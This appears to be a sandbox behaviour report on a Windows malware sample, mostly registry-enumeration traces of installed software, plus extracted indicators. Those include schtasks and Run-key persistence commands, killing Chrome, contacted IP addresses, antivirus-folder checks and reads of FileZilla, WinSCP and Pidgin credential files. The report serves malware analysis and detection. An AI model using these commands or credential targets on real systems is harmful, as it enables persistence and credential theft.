base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)
1 0 0

RegOpenKeyExW

regkey_r: Office15.PROPLUSR
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR
1 0 0

RegOpenKeyExW

regkey_r: SchedulingAgent
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExW

regkey_r: WIC
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExW

regkey_r: {00203668-8170-44A0-BE44-B632FA4D780F}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}
1 0 0

RegOpenKeyExW

regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
1 0 0

RegOpenKeyExW

regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
1 0 0

RegOpenKeyExW

regkey_r: {26A24AE4-039D-4CA4-87B4-2F32180131F0}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}
1 0 0

RegOpenKeyExW

regkey_r: {4A03706F-666A-4037-7777-5F2748764D10}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}
1 0 0

RegOpenKeyExW

regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-0015-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-0016-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-0018-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-0019-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-001A-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-001B-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-001F-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-001F-040C-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-001F-0C0A-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-002C-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-0044-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-006E-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-0090-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-00A1-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-00BA-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-00E1-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-00E2-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-0115-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-0117-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-012B-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {91150000-0011-0000-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
1 0 0

RegOpenKeyExW

regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
1 0 0

RegOpenKeyExW

regkey_r: {AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: {BB8B979E-E336-47E7-96BC-1031C1B94561}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}
1 0 0
Time & API Arguments Status Return Repeated

NtTerminateProcess

status_code: 0xc0000005
process_identifier: 2376
process_handle: 0x00000000000000bc
0 0

NtTerminateProcess

status_code: 0xc0000005
process_identifier: 2376
process_handle: 0x00000000000000bc
1 0 0
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\9c69749b54\gntuud.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe" /F
cmdline cmd.exe /c taskkill /f /im chrome.exe
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe" /F
cmdline taskkill /f /im chrome.exe
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\9c69749b54\gntuud.exe" /F
host 185.106.92.214
host 31.41.244.14
host 31.41.244.188
host 31.41.244.237
host 31.41.244.253
host 62.204.41.6
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\linda5.exe reg_value C:\Users\test22\AppData\Local\Temp\1000001001\linda5.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\nash.exe reg_value C:\Users\test22\AppData\Local\Temp\1000002001\nash.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\anon.exe reg_value C:\Users\test22\AppData\Local\Temp\1000003001\anon.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\newlege.exe reg_value C:\Users\test22\AppData\Local\Temp\1000004001\newlege.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\mp3studios_97.exe reg_value C:\Users\test22\AppData\Local\Temp\1000058001\mp3studios_97.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\linda5.exe reg_value C:\Users\test22\AppData\Local\Temp\1000061001\linda5.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wish.exe reg_value C:\Users\test22\AppData\Local\Temp\1000067001\wish.exe
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\9c69749b54\gntuud.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\9c69749b54\gntuud.exe" /F
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
registry HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
file C:\Users\test22\AppData\Roaming\.purple\accounts.xml
Time & API Arguments Status Return Repeated

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 7-Zip 20.02 alpha
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Mozilla Thunderbird 78.4.0 (x86 ko)
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java 8 Update 131
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java Auto Updater
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Access MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Excel MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft PowerPoint MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Publisher MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Outlook MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Word MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing Tools 2013 - English
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Outils de vérification linguistique 2013 de Microsoft Office - Français
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing Tools 2013 - Español
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft InfoPath MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft DCF MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft OneNote MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Groove MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OSM MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OSM UX MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared Setup Metadata MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Access Setup Metadata MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Lync MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Acrobat Reader DC MUI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000328
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 7-Zip 20.02 alpha
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000328
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000328
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000328
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000328
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000328
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Mozilla Thunderbird 78.4.0 (x86 ko)
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName
